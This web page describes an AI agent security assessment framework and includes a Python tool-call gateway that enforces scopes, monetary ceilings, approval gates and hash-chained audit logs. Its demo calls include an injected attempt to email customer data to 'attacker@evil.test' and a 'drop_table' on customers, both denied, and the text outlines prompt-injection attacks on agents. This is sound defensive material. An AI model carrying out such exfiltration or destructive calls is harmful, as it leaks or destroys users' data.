
AI Agent Security

AI agents are LLMs given the ability to take actions in the real world: call APIs, write to databases, send emails, execute code, browse systems. An agent's blast radius is the combined blast radius of every tool it can call, under whatever credentials those tools run with. This framework covers the controls that keep agentic deployments within acceptable bounds. The assessment is appropriate when your organization runs customer-facing copilots, internal automation agents, computer-use agents (e.g., browser-driving assistants), code-writing agents, or any LLM-driven workflow that takes consequential actions beyond returning text.
Use AI Agent Security alongside AI Security (AISS) for organizations deploying agents at scale. AISS covers the broader AI program; AI Agent Security drills into the specific guardrails required for agentic systems.

What this framework covers

The assessment spans control areas that directly address the OWASP LLM06 Excessive Agency risk and the MITRE ATLAS agentic-AI technique cluster (T0080, T0086, T0098–T0112).
  • Approval workflow before agents reach production, risk classification of agent use cases, a complete agent inventory, deployment controls, and pre-production review processes.
  • OAuth scope limits, API key scoping and rotation, user-impersonation boundaries, secret storage patterns, and the credential model for agents acting on a user's behalf.
  • Per-agent tool manifests, human-in-the-loop approval gates for irreversible actions, server-side blast-radius limits (rate caps, monetary ceilings, scope predicates), and write-action authorization.
  • Defense against direct and indirect prompt injection: input validation, retrieved-content trust boundaries, instruction-data separation, and output filtering before downstream actions execute.
  • Per-invocation audit logs tying actions to both the agent and the human principal, anomaly detection on tool-call patterns, prompt/response logging, and tamper-evident log retention.
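The credential, tool-authorization and audit controls above (scope limits, per-agent tool manifests, scope predicates, monetary ceilings, approval gates for irreversible actions, and per-invocation logs tied to agent and principal) fit together in one enforcement point that sits between the model and its tools. The following is an added worked example written for this page; it is not the framework's or any vendor's code. The gateway class, the manifest schema, the tool names, the OAuth scope names and the support-copilot scenario are all assumed for illustration.

```python
# Added example, not the framework's own code: a server-side tool-call gateway enforcing a
# per-agent tool manifest, OAuth scope checks, a scope predicate, a monetary ceiling and a human
# approval gate for irreversible actions, with a hash-chained per-invocation audit log that ties
# each call to the agent and the human principal. Every name, policy and scenario is hypothetical.
from __future__ import annotations
import hashlib, json, time
from dataclasses import dataclass
from typing import Any, Callable

class ToolCallDenied(Exception):
    pass  # a guardrail rejected the call; the denial is still audited

@dataclass(frozen=True)
class ToolPolicy:  # one entry of the per-agent tool manifest (assumed schema)
    required_scopes: frozenset[str] = frozenset()   # OAuth scopes the agent must hold
    irreversible: bool = False                       # needs a synchronous human approval
    max_amount: float | None = None                  # monetary ceiling per call
    predicate: Callable[[dict], bool] | None = None  # scope predicate over the arguments

@dataclass(frozen=True)
class Approval:  # a human approval bound to one principal, one tool and one exact argument set
    principal: str
    tool: str
    args_digest: str

def args_digest(args: dict[str, Any]) -> str:  # canonical, so an approval cannot be replayed
    return hashlib.sha256(json.dumps(args, sort_keys=True).encode()).hexdigest()

class ToolGateway:
    def __init__(self, agent_id: str, granted_scopes: set[str],
                 manifest: dict[str, ToolPolicy], tools: dict[str, Callable[..., Any]]):
        self.agent_id, self.granted_scopes, self.manifest, self.tools = agent_id, granted_scopes, manifest, tools
        self.audit: list[dict[str, Any]] = []  # hash-chained; see verify_audit()

    def _decide(self, principal: str, tool: str, args: dict, decision: str, reason: str = "") -> None:
        # Allows and denials are both recorded; each entry commits to the previous one's hash.
        prev = self.audit[-1]["hash"] if self.audit else "0" * 64
        entry = {"ts": time.time(), "agent": self.agent_id, "principal": principal, "tool": tool,
                 "args": args, "decision": decision, "reason": reason, "prev": prev}
        entry["hash"] = hashlib.sha256(json.dumps(entry, sort_keys=True).encode()).hexdigest()
        self.audit.append(entry)
        if decision == "deny":
            raise ToolCallDenied(reason)

    def invoke(self, tool: str, args: dict[str, Any], principal: str,
               approval: Approval | None = None) -> Any:
        # Every check runs here, server-side; the model's own output is never trusted to gate itself.
        policy = self.manifest.get(tool)
        if policy is None:
            self._decide(principal, tool, args, "deny", "tool not in agent manifest")
        if missing := policy.required_scopes - self.granted_scopes:
            self._decide(principal, tool, args, "deny", f"agent lacks scopes {sorted(missing)}")
        if policy.predicate is not None and not policy.predicate(args):
            self._decide(principal, tool, args, "deny", "scope predicate rejected arguments")
        if policy.max_amount is not None and float(args.get("amount", 0)) > policy.max_amount:
            self._decide(principal, tool, args, "deny", f"amount exceeds ceiling {policy.max_amount}")
        if policy.irreversible and (approval is None or approval.principal != principal
                                    or approval.tool != tool or approval.args_digest != args_digest(args)):
            self._decide(principal, tool, args, "deny", "irreversible action lacks a matching human approval")
        result = self.tools[tool](**args)
        self._decide(principal, tool, args, "allow")
        return result

def verify_audit(entries: list[dict[str, Any]]) -> bool:  # an edited, dropped or reordered entry breaks the chain
    prev = "0" * 64
    for e in entries:
        body = {k: v for k, v in e.items() if k != "hash"}
        if e["prev"] != prev or e["hash"] != hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest():
            return False
        prev = e["hash"]
    return True

def demo() -> ToolGateway:  # constructed scenario: a support copilot acting for user:alice
    manifest = {
        "send_email": ToolPolicy(required_scopes=frozenset({"mail.send"}),
                                 predicate=lambda a: a["to"].endswith("@example.com")),  # internal recipients only
        "issue_refund": ToolPolicy(required_scopes=frozenset({"billing.refund"}), irreversible=True, max_amount=100),
        "read_ticket": ToolPolicy(required_scopes=frozenset({"tickets.read"})),  # scope this agent was not granted
    }
    tools = {"send_email": lambda to, body: f"sent to {to}", "read_ticket": lambda ticket_id: f"ticket {ticket_id}",
             "issue_refund": lambda customer_id, amount: f"refunded {amount} to {customer_id}"}
    gw = ToolGateway("support-copilot", {"mail.send", "billing.refund"}, manifest, tools)
    user, refund = "user:alice", {"customer_id": "c-42", "amount": 40}
    ok = Approval(user, "issue_refund", args_digest(refund))
    calls = [
        ("send_email", {"to": "ops@example.com", "body": "ticket 17 escalated"}, None),  # allow
        ("send_email", {"to": "attacker@evil.test", "body": "<customer data>"}, None),   # deny: predicate (injected exfil)
        ("read_ticket", {"ticket_id": 17}, None),                                        # deny: missing OAuth scope
        ("issue_refund", {"customer_id": "c-42", "amount": 500}, None),                  # deny: monetary ceiling
        ("issue_refund", refund, None),                                                  # deny: no human approval
        ("issue_refund", refund, ok),                                                    # allow
        ("issue_refund", {"customer_id": "c-42", "amount": 90}, ok),                     # deny: approval replayed
        ("drop_table", {"name": "customers"}, None),                                     # deny: not in manifest
    ]
    for tool, args, approval in calls:
        try:
            gw.invoke(tool, args, user, approval)
        except ToolCallDenied:
            pass  # already audited as a denial
    return gw
```

Three design points carry most of the value. The approval is bound to a digest of the exact arguments, so an injected change to the amount after a human approved the refund fails closed rather than riding on the earlier approval. Denials are audited alongside allows, because the denied calls are the ones an investigator needs after a guardrail failure. The hash chain only provides tamper evidence if the current head hash is periodically shipped somewhere the agent runtime cannot write; on its own it just makes edits detectable to whoever holds a trusted copy. Rate caps belong at the same enforcement point as the monetary ceiling and are omitted here only for brevity.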

Why this matters for customers

Customers deploying AI agents face a structural risk that didn’t exist with traditional software: one prompt injection or one misaligned decision can cascade into data loss, financial loss, or customer-facing incidents. The AI Agent Security assessment surfaces:
  • Whether your agents have least-privilege grants or whether they inherit broad user permissions
  • Whether irreversible actions (deletes, payments, account changes, code merges, outbound customer messages) require a synchronous human approval gate
  • Whether tool invocations are logged with sufficient detail to investigate after a guardrail failure
  • Whether your team has run adversarial testing on the agent guardrails specifically

How it relates to other frameworks

AI Agent Security focuses narrowly on the agent layer. For the surrounding controls — data governance, model security, supply chain, training and awareness — pair it with the AI Security (AISS) assessment. For LLM application risks more broadly (not just agents), see the OWASP LLM Top 10 assessment. For the foundational risk-management lifecycle, see NIST AI RMF.

Glass-Box scoring

Every score on this framework is reproducible from the published rubric: weighted category scores, per-question maturity tiers, and citations to MITRE ATLAS technique IDs and OWASP LLM Top 10 entries. Auditors can verify any sub-score line by line.